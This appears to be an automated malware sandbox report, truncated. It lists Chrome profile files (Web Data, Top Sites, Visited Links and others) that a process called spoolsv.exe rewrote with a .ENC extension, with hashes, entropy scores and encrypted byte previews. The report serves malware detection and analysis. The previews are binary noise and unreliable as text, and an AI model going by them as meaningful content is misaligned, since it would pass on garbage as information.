                                                                                                                                                                                                                                                      Preview:...F..SQa.r..O.a..$0.f.9.....A^.p..:U....^.@._.EP./~.`..=i..y.v...Q;J.]..OA.k.....l}....?8l]..|..Rs:2.E_..........M..v.-0.....<._;.s...Mtq..s.......P.i.~v..c.BDqt.t.....$..7..S..N_.mPa....d..?....=.>.p..#.16....K......t1..E...s....Ms.,t.....)V.`.U>..tY...Q..!U+ ..@|.4#A..#..h...8~$..b.."....$..........j.k...,t.e.>,..D@^.5.......c.L|(+...=.2./xg..k...Fs+.C../-/...vW*..Z..E.L.x...?...o._..9......Q........&qi.I.Fr.@..P...A.t..@t.....:Z.h..G...9..L%.$*`..s.J=.......WX.m&......|d.ZIi.*....U....L..>....j.E..8......rcF.......U.7_x.......y.F.8.J(c..:Io{x..SZ...%......{.62A..]h.{.*....U.G.e.i's.....jq..s.E.,Y<.V.&.}2.......&0.F..E.X.^...*JO._V...Wln..X..6.3A..?........l..]/....{(..K..eL}. a.+=G..>|.'...dB..P.....0hm0,..b;.Yq&.1?....!.xE...m.[..0..x1.|Vf....%.0.U....9..:..Q.F0.........!,qh5.3U%h.x.0.^..S..h..c...)W.(?. .s...2J....k.Yr.....e>.3...u;.-..pV.X.H...]..=..R........d....i.2A.[.`ib7.lsj.U..n....B.......[.,^+.4lx....}....B.....8g.l.LdE..6#.xzg.M

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\CURRENT.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.9375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:QRzgTczBv:Q5d
                                                                                                                                                                                                                                                      MD5:328FC1F4C693CE30D6A0FB47D34D59E3
                                                                                                                                                                                                                                                      SHA1:A49BAAFDEFA3CE958AA56709FF598FBA601A8798
                                                                                                                                                                                                                                                      SHA-256:F6F0E310BCA7FD98AA03FE19DDCBB88434AFBBBC51A64774405F82DD457CBA2B
                                                                                                                                                                                                                                                      SHA-512:B1CF96413C6D8BEB6D3A6D26CCA9068DF4B7EAD78D4C0E7454AC7D4B938BA49311B060A6C7B8277C7A8A667C6A9A674C0063EA05EAA2F205F110ADB9534A28BC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...Y.4.t*..V.h=.#..x..k..Y.$.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):336
                                                                                                                                                                                                                                                      Entropy (8bit):7.348803156362293
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:mqwPF7yDVafdbfjo5hr8qtUX3P/5CWGux5KpUcfla0rZNPqA708Yo:YF7yReotUn5CMPK+slbrZNiAw8v
                                                                                                                                                                                                                                                      MD5:42D0CA71F4F426E5EC3CA7820127B043
                                                                                                                                                                                                                                                      SHA1:EEFE4A15742FEBA8CD213D177D8719B2FADA51FA
                                                                                                                                                                                                                                                      SHA-256:3E8550E5DE1E624552222744234E8CDA5E1D75B5715C2506972E40C0358CD689
                                                                                                                                                                                                                                                      SHA-512:90E769FC7A2FE400DA873F25940B61B2B74D9262D90491A25364EB47C11D06A06E1EF84E7E1F609A668E00BD0241941431B1F077441402E960811A71EA0F1F79
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<....|......}.y...,..9..y.W.*..(w....../.1...S.<Fn.0T..............gs.:...<@.,.][.w.L..K..A~..V.i.XrA.M.OF........g....G.g.e.Q.Q.G..@...*......}u1.o.....q.....`U....84...T..A...<#..]5N.q.v..J.7{..@`*....F...,...1..n6/2<m:.../.....(.E..}}.mB..]..x.<...=.'.....]L..1>..71....{P-...E-K$).*.8..JM.H..:....Q..F...y.....Dp

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\MANIFEST-000001.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                      Entropy (8bit):5.543295834054493
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:qb0z5ZjCY:+aH
                                                                                                                                                                                                                                                      MD5:00B5963CADCB5E972047846E44EE2632
                                                                                                                                                                                                                                                      SHA1:3741D074C652E62798A616ED56C811482AF90C65
                                                                                                                                                                                                                                                      SHA-256:AD5D4ADA9FA65FCFCC5B74692628D26993377029E512DC6FC103A8819650AD66
                                                                                                                                                                                                                                                      SHA-512:ACC0812854372F9CE7AE2854D5EDB6D4B02D820E275524CEDA2329495CCE7D0CB3E8455A426E67BBBAA8CA2F5C1701D68FF1444DD0318EEE647717EC264B308E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...P...`&)....Y..R.r...........yT.?.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20496
                                                                                                                                                                                                                                                      Entropy (8bit):7.992059556666749
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:384:Ncq/YN2PKs80/dl4HlXyfZq2NExeAjRxquQMwvhN5yWFh:NtYFs84kwqLQMuufuNyW/
                                                                                                                                                                                                                                                      MD5:E3A4B04D3210D075E7B4DFBAB3F8E727
                                                                                                                                                                                                                                                      SHA1:338EF90FB291554B8E3ED5B28EBB6DAFB0985EFF
                                                                                                                                                                                                                                                      SHA-256:D1326F89D2561DA0E483F286C22EE890F74DBB75D6E5748F41990850A35EE0C1
                                                                                                                                                                                                                                                      SHA-512:EE14CD8EE3825624943F15EACCA17C4A541E941D42E5AFCE5D986464185F5F9C1824F35068FF35D1C8B7F35BB093949E310D649C8AC58B8696D6B44B64AD6881
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:rS7n2.*........)..G......t..:y.. .r..0Or.Z.....MhG:..@siz..%./.%.-,|.....;.u.#......W&.G..UC.=...T..<...u.P.S..._.....B"...0..g.X..'=...K..c.uP..z....[.......m. ]..\W....%.....U..e..L..V.ax.Zh}P!...E...u..@q.....e<.\3_../.0.=.... ..jc..Y._._.........I...T.`]k...'......o.....j....K..a........'y"..E..A."B...T.Z.....9..B.S.&%.Xx).....1.&H....u......f...~..........SzN...p...OWbp.......\d.lJHEP.aS...{.J#.....+*...G..z..d8=\...QQra...p:8..Wn...P.`.3...hA...X..x..]..E.....7......{k....P.{..:IMI..s..(..y{5.4..V..*...q..6..o...)~).=..4.T.E...h....[)..E..M.Z...s^^.<.(X...E..d.....*.^H..;.E.r...f|. )T..!.E.f.z....D...f..'fV...E/.nD.b..'.?$SKK..~..F....l..1.........6.q.b......../t2}E.......".r...z(Fn...*2.......N..|8...k.@.7......P......9.@.m..3...).yT......x....._.....R.7.q.LiF.?......;...L..h.O.......|...HK..Z.u.k.I-..%.q5.w.A.I...q..g..D.M.+..&.JjZ...tX.........Vx..K.m.Q...=..! ..Q....3....`.#>.,1+.,1.`dM.....d9...HZZ.f*...t.$._...2.&.b......s.Vc[...s

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):131088
                                                                                                                                                                                                                                                      Entropy (8bit):7.9985496233511
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:3072:yrdVos0ihnBOD3aYg+dBvCl6T7p7aw6lVL6pQ6pWFkT8lmV3rLpuirK8:Mwx0oKj+rKqx6ipxpW+IlE74irD
                                                                                                                                                                                                                                                      MD5:28C2E7B92C5124EAB4B7AAC786000064
                                                                                                                                                                                                                                                      SHA1:EFEAF4CACE13042828BD0BE72C20A7F2EAB63C06
                                                                                                                                                                                                                                                      SHA-256:FCF510638A9157B83DB983860E840F9F6F1B9C2DD79EE922D2E156F2286DB075
                                                                                                                                                                                                                                                      SHA-512:AD8661541AE0DF4B30A3528FB0A4393DF0386FFA7D596BF129516544D3A789610DDC3F9F37206DC848D71E956A983C1DC3C49368A24A515751AFB6A0FBDD374C
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..j.T#.3.A..=q.ST...j..=...To..G$..K..x.x....J...2.8*uJ(F.(Buq".&..h.^..$.y..*........rw....<.J_&<.Y..3wb...(p`.K._...#...'.+............{c.......g.q......+.x..6.j`...*.`(..!.H...Z.vW..;...`WrCM..3z).,..f.........|...o.6.t....E.E..v......|.N.).%B..=..>.>.7.C..U.,..:.r u1.y%3^...[._.O..J.......K.I-...meK..Y.m..4...^...6..Zid..+..oQ.K..Na....T..6...Y.^.y.{...r.[;....h...:.x..J.Z._..i..".4?..Z8N.....q'...#.......sU...."m....7.U..:.'......yJ.Bu....(..W..6....i........O.fM......d.u.*...wVp...D}{....j.V.D..\)q...G..-Z.:.Y.&....W.=..e...QFs.>O..H..Q.`.7..k...fB?.._. .#....E....=c....)C..ao..|.W..|L.........-.n..h....Fgs..........uZ..Lkrq.lfB....9...,.......?.d.A..u.18.Do...{.Y....k..l=.Q>Z}.....Z......n....,7...\L...fe...>@ .c...0...a.....'.`.e....=^.'.S.O....a6.].;...h....E......<F..@`..-..):{f....]v....ss.1x..../.....Q..;..H..A..%x.....y6M...-..k..u.Q._..>.i.w..U]...B.]..vV..l..Im.j....W.F35.E.lT..k*E.(..Hl._.4.A..6....r...:w.)y.u..M...Hn.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):106512
                                                                                                                                                                                                                                                      Entropy (8bit):7.998534371994368
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:3072:gULJTm3FU7jz68RoqHZDkDqA4xsuhWWqpXofwZDFsq:Tlq367ju8uotkL4+Wq5oY3
                                                                                                                                                                                                                                                      MD5:614F39B538DBD4F8DE4835C307371CC6
                                                                                                                                                                                                                                                      SHA1:96BC4498D3E02D8DFF05A4481768FC0F08C61E65
                                                                                                                                                                                                                                                      SHA-256:5F9C7DF7B2AEF5DBDD7F2151096CF4A7247B4E84414B73A673CA642BAB794849
                                                                                                                                                                                                                                                      SHA-512:F19FD42E9D6A4D46065B85054BFA0850C9B0FC5977B234BAB5A174D9979DD1D7404E7D770C842832E35FDC3440D4908AC9F855CCAC47BA3182EFA1342A95C648
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:rS7n2.*..........XRR.:....H..p...?cV...U:b.DP.B..3DO.9.._.FdH.k{..h...5..#...+.Q.a.c...l.P4j\.W...B.4.....Z..e.....T....N.$5...4~...i.3B....,....X.....0.m...-.......m/...{...O.}....2H4[e..>..*.....9....d6=.7..q...|.e...5...P.xn....!.][9...]j..(.#..*.....2:..UI....Z.....WZ....yL.........-.U....`...V.K..7....X.....EB......g.F..?..]JSp.C..DYAT...=..!L...W5.j..L........c9....`.@<....w6..6`../...d.....?."...N......{.....d....LBH.W.c...x.k.'6..?.C5..-._)..'..'......1.A."....+..j.mky.S..U..\....A.N@.M......[.>d.....l.$L..o....h{.:...wa{...*.mI..+..`...s5..?6..e..xF..c,R~V..Av.~...f.\...f.}....I...|.l.$L.......G<.?V..[.f3.Q..?..?...!.Y.....S.6t.g.i..b.y?p.`....[.NaM...^.$.%.-...4.......W.....$0...Q...Z..F...T.|..<xa.D..pb.2t....CS.5...a....#N;[......w2.E?.:.W)....;.N...[.]h._...G.JK._...0..th5{,K..._f.......V.vq.[.....@..Xd.E.S.Db.x.d..4.*.%.2i.8....6..d|..<..8.\A+....n$..@[ .....X..bb..}...@.".^.....*..w...e,..J..j.~...K...f.T

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16400
                                                                                                                                                                                                                                                      Entropy (8bit):7.988796218378573
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:NvYdbdszvo1LgEs/nOEBQm2mlKzjT82bQSU8NGu0OVyT:NmdsicEClkmqjTVbQY71VyT
                                                                                                                                                                                                                                                      MD5:11E57CB456881F1E63EEA915342D0A73
                                                                                                                                                                                                                                                      SHA1:E093F676BF1ADABA7569CE637A1AD8C90FF73D1A
                                                                                                                                                                                                                                                      SHA-256:E4D0615503C22FC2325723060189148C9D3F380AC92A1E0BB031B46980EFB9E9
                                                                                                                                                                                                                                                      SHA-512:E8AD8FE612D0210C31AE5945F3AC70C70530AE19F06F13C0A6EFC1C72C0446F55DF8027A2FF065AACE5D089359504F9CFB7078D0CC8B94BB76DB8BFCCD5440DE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:rS7n2.*..........pw.w.{w...4C..(...Z.9O..l."...2~........=?....{LX..db[.6..B.&-|=....Q..Q..g..w.x:.lpOcPYdU.(=.5N...f..[T.DI...=...c...sK..l...7..6....T...6...+.(.\......7S)./...E.l;..8.N.f(...?rB....R^.SJUY.-...}C....\...,...X.I.....q..V....7m..H+g..k.."c...+n..ID.L8.|...+.X.s-q.........>....f..9N.x.%-....2.,.+a..".#\...m.....4..Q7nd...*.}....*$0...".....f.............._..q..s._%q..<e7..+3.........|DM9..U._0}...l..9...[n...0%5].......Y.qu.........;.......K..*]..)......u.7.Y.].g..X.C+..M.......+r..c.....O2.^...9...U.....4.9.+..K.......&:..7iP..6-y{...61.h.*:..@...g).3Z..5..T.p..KH......-.(.(...U~.Z..R....9>I;...=<.Q/.1.>(\../m.I......l.|..@...(.......;.e#.fS....Z.St....A.g~....OU...Nt.S$G...I.!<..&k.....A..X.c..h&.x.q#O..u&...*4..........yd..'\..[.V&.Eb..P_..w).&.b..{%...'+...F8/.I.R.....^Bj.....0.Yy.rY.!..^:.N$F*E.b.ue\...mUc.{.S....J...H;.......`v?a.....`.\..[..f.u...B...-j&&Z.....y.M1Z.#.sI.{..'T.c..u.r.....~...8..?Fg..`.YsEb..6.1m.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
